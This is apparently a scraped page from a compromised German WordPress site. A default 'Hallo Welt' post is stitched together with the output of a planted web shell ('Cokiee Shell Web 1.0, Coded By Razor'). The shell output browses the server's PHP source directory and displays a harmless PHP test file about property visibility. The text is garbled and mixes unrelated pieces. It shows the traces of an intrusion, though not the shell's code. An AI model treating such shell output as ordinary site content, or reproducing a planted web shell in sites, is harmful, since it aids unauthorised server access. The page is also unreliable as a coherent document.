Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/tests/classes/ |
Current File : //usr/local/src/php7/php-7.0.5/tests/classes/property_override_protected_private.phpt |
--TEST-- Redeclare inherited protected property as private (duplicates Zend/tests/errmsg_023.phpt). --FILE-- <?php class A { protected $p = "A::p"; function showA() { echo $this->p . "\n"; } } class B extends A { private $p = "B::p"; function showB() { echo $this->p . "\n"; } } $a = new A; $a->showA(); $b = new B; $b->showA(); $b->showB(); ?> --EXPECTF-- Fatal error: Access level to B::$p must be protected (as in class A) or weaker in %s on line 18
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare